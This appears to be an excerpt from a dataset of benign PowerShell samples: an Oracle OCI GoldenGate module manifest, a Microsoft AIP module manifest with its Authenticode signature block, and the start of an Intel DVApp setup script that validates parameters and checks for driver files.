'Stop-OCIGoldengateSnoozeDeploymentUpgrade', 'Update-OCIGoldengateConnection', 'Update-OCIGoldengateDatabaseRegistration', 'Update-OCIGoldengateDeployment', 'Update-OCIGoldengateDeploymentBackup' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Goldengate' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_53_46.ps1
sample_53_46.ps1
@{ # This file should have the product name, else powershell module will not work please read "Use the correct Module Directory Name" section here https://msdn.microsoft.com/en-us/library/dd878350(v=vs.85).aspx # Script module or binary module file associated with this manifest RootModule = '..\..\AIP.dll' # Version number of this module. ModuleVersion = '3.0.58.0' # ID used to uniquely identify this module GUID = 'c219bda8-3669-4529-a01f-8381d49b5b92' # Company or vendor of this module CompanyName = 'Microsoft Corporation' # Copyright statement for this module Copyright = 'Copyright (c) Microsoft Corporation. All rights reserved.' } # SIG # Begin signature block # MIIoLQYJKoZIhvcNAQcCoIIoHjCCKBoCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDclhuCn06WnGYy # HmHKcOf+yvNPVNtCmWiAK5QuX/FlKaCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIDp4C34tgFVk9NiG+mBdGCOJ # /PV0/B6GmwrHjcQLfhjlMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAbBXCeDvzXxBYYJSYE++Sxb+UrkIGA47EzOpniM5wiuKZhjWZBtWF+EWm # nnHnxPv5urvLL7awqkmYZL+lc6V/OiVoH1IGDzsSoNj9tzJTwhmxAYwaH75CQ3af # 0evMUNXgykvrfXaynt0iCrb1y0Qf4dDVuSkiEzerWlDBP+LV+gdjKHmuox63ROff # CMmK2njokY8/GpEYXR6/pDpFfqUJoVy9cdzWIGsmrNypDfEz23C1XiDKIkMaSWM5 # TEAW3FwPY9CzSVcX69igvgvqVnIRF4ta45kpPUw3ZqY3ujlaKu8/zTqSgEck5Lz7 # CTNvcF7VFmEiMp4eHSRURHcGIOz/FqGCF5cwgheTBgorBgEEAYI3AwMBMYIXgzCC # F38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCCt8FQ6PCFiO9hWX3kxk7dK70QNlcz8i+3swA4G3rMX8gIGZjOSoXCj # GBMyMDI0MDUwODExMDUzMi45MTVaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHtMIIHIDCCBQigAwIBAgITMwAAAeqaJHLVWT9hYwABAAAB6jANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # MzBaFw0yNTAzMDUxODQ1MzBaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046MzcwMy0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQC1C1/xSD8gB9X7Ludoo2rWb2ksqaF65QtJkbQpmsc6 # G4bg5MOv6WP/uJ4XOJvKX/c1t0ej4oWBqdGD6VbjXX4T0KfylTulrzKtgxnxZh7q # 1uD0Dy/w5G0DJDPb6oxQrz6vMV2Z3y9ZxjfZqBnDfqGon/4VDHnZhdas22svSC5G # HywsQ2J90MM7L4ecY8TnLI85kXXTVESb09txL2tHMYrB+KHCy08ds36an7IcOGfR # mhHbFoPa5om9YGpVKS8xeT7EAwW7WbXL/lo5p9KRRIjAlsBBHD1TdGBucrGC3TQX # STp9s7DjkvvNFuUa0BKsz6UiCLxJGQSZhd2iOJTEfJ1fxYk2nY6SCKsV+VmtV5ai # PzY/sWoFY542+zzrAPr4elrvr9uB6ci/Kci//EOERZEUTBPXME/ia+t8jrT2y3ug # 15MSCVuhOsNrmuZFwaRCrRED0yz4V9wlMTGHIJW55iNM3HPVJJ19vOSvrCP9lsEc # EwWZIQ1FCyPOnkM1fs7880dahAa5UmPqMk5WEKxzDPVp081X5RQ6HGVUz6ZdgQ0j # cT59EG+CKDPRD6mx8ovzIpS/r/wEHPKt5kOhYrjyQHXc9KHKTWfXpAVj1Syqt5X4 # nr+Mpeubv+N/PjQEPr0iYJDjSzJrqILhBs5pytb6vyR8HUVMp+mAA4rXjOw42vkH # fQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFCuBRSWiUebpF0BU1MTIcosFblleMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQAog61WXj9+/nxVbX3G37KgvyoNAnuu2w3H # oWZj3H0YCeQ3b9KSZThVThW4iFcHrKnhFMBbXJX4uQI53kOWSaWCaV3xCznpRt3c # 4/gSn3dvO/1GP3MJkpJfgo56CgS9zLOiP31kfmpUdPqekZb4ivMR6LoPb5HNlq0W # bBpzFbtsTjNrTyfqqcqAwc6r99Df2UQTqDa0vzwpA8CxiAg2KlbPyMwBOPcr9hJT # 8sGpX/ZhLDh11dZcbUAzXHo1RJorSSftVa9hLWnzxGzEGafPUwLmoETihOGLqIQl # Cpvr94Hiak0Gq0wY6lduUQjk/lxZ4EzAw/cGMek8J3QdiNS8u9ujYh1B7NLr6t3I # glfScDV3bdVWet1itTUoKVRLIivRDwAT7dRH13Cq32j2JG5BYu/XitRE8cdzaJmD # VBzYhlPl9QXvC+6qR8I6NIN/9914bTq/S4g6FF4f1dixUxE4qlfUPMixGr0Ft4/S # 0P4fwmhs+WHRn62PB4j3zCHixKJCsRn9IR3ExBQKQdMi5auiqB6xQBADUf+F7hSK # ZfbA8sFSFreLSqhvj+qUQF84NcxuaxpbJWVpsO18IL4Qbt45Cz/QMa7EmMGNn7a8 # MM3uTQOlQy0u6c/jq111i1JqMjayTceQZNMBMM5EMc5Dr5m3T4bDj9WTNLgP8SFe # 3EqTaWVMOTCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ # MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjM3MDMtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCJ # 2x7cQfjpRskJ8UGIctOCkmEkj6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6eVRJTAiGA8yMDI0MDUwODAxMTcy # NVoYDzIwMjQwNTA5MDExNzI1WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDp5VEl # AgEAMAoCAQACAjlkAgH/MAcCAQACAhQYMAoCBQDp5qKlAgEAMDYGCisGAQQBhFkK # BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ # KoZIhvcNAQELBQADggEBAFs56qTDWSiXc9mb8Vqq8xNSlzdy/O9/ulRTFHmNjWkq # yYiayAQkp6FRN+wLrhyz3m7z3OEVpygN+lETNrxdpt8CDwrZs1UoTNTp2rO/wKWt # IvqrfqitzbYxHbQjdxYYFjjgS9+p043fG77yiyLxot1dtQNK22/EuEWnGdOE5JLh # cBSLHPpjImIZDmjTnRAgy/CNZj9eSgGWj84OEAsZMv2eVvdbUwWMAkatVrCL+ntK # i2VTUKOvDeOOSj1LIhm7pQdicn2yYR+7nl9oQLRo0LeYr2qUJ62Pe+6vb60o23vE # W3kX6HZ5OVFMcGixQOw03vg5nnpUIrQYnGdIbzW0w6QxggQNMIIECQIBATCBkzB8 # MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk # bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N # aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAeqaJHLVWT9hYwABAAAB # 6jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE # MC8GCSqGSIb3DQEJBDEiBCDgQzw/yXFOMV422VGlyW/bs7UdN89vwdb313fZ0dBB # SjCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICmPodXjZDR4iwg0ltLANXBh # 5G1uKqKIvq8sjKekuGZ4MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAHqmiRy1Vk/YWMAAQAAAeowIgQg7nz11ub3pAa4gfYo3UIwC9qs # KURTfBWxHCzibkfg50AwDQYJKoZIhvcNAQELBQAEggIAE5uXKWg0PKgkn5nzje94 # BHa8Sw1BHEzmKHTlf1AMr+S8O21IBI2qO8E1nAwb/HxSnVk9cXonOp60yeQiBUkB # f2LqxmAEkskZs//0NYVkkzV2X+60TfEMBdryO0vejqE7WBrHZ3xlwuY79yyZ4rw+ # K3vTTcrSOK4aDyVGyZIWD4Xlmbfa25NKOA7/HY7GRNI1ZSWKvye1rKroEUHFWdDV # wJEkdIdM6LighY0nE9aoNh19wz+l9QkNQeIlyTLEIZSOrqaOlTfU67igCNvl6JZ+ # yWrBHRw7tUexN0ZlUKkdItqk3HF76q2ZrjyGdwxqKlFc3tqs4qJa8GhzFirrAcPC # Te5dv4/VK5rgRdMOnqkcFZ/Mt7vOTotfh7Z57RYdfjY2ofQAlLy2/42JsXjhJfUn # 3+0CkePs5hIXMiJBoYwtaDDKAHn3Fxcm+99p/UhYyUOddP395qdl1ANUsKjuk73i # qCzqgfIadvWkI9rSOnNaoyCSwoJNvNbh1tSTR7sdm6qVnH0uma2XcW8JzPNvdOep # PKBfma1pgsN1ihAePuGIAezQfNmo/3WCe4nNvU2YQaQEgskOL+Z9senqz/gxHKsp # L+yCjkcT7UnR0DdGioZvhFzDBh+lkQukpEebTcrT2yQroXQ0lrOUY6EEDIWFa24f # eIS3LoFyAW/Zxrlg5Edp8uk= # SIG # End signature block
combined_dataset/train/non-malicious/sample_13_53.ps1
sample_13_53.ps1
#=========================================================================== #DVApp.ps1 #---------------------------------------------------------------------------- #Copyright (C) 2021 Intel Corporation #SPDX-License-Identifier: MIT #--------------------------------------------------------------------------*/ param ($param1) #This API will validate the input command line params function validate_input_params($param1) { if (($param1 -eq "setup") -or ($param1 -eq "run")) { Write-Host "Input parameters are valid, continuing..." } else { Write-Host "Input parameters are invalid, try > DVApp.ps1 run (or) DVApp.ps1 setup" Write-Host "Exiting from powershell script..." return "FAIL" } return "SUCCESS" } #check if file present function is_present($filepath) { $isavailable = Test-Path $filepath return $isavailable } #check if all the required binaries are present or not function check_executables() { if ((is_present("DVServer\dvserver.cat") -eq $true) -and (is_present("DVServer\DVServer.dll") -eq $true) -and (is_present("DVServer\DVServer.inf") -eq $true) -and (is_present("DVEnabler.exe") -eq $true) -and (is_present("DVServerUMD_Node.exe") -eq $true)){ return "SUCCESS" } 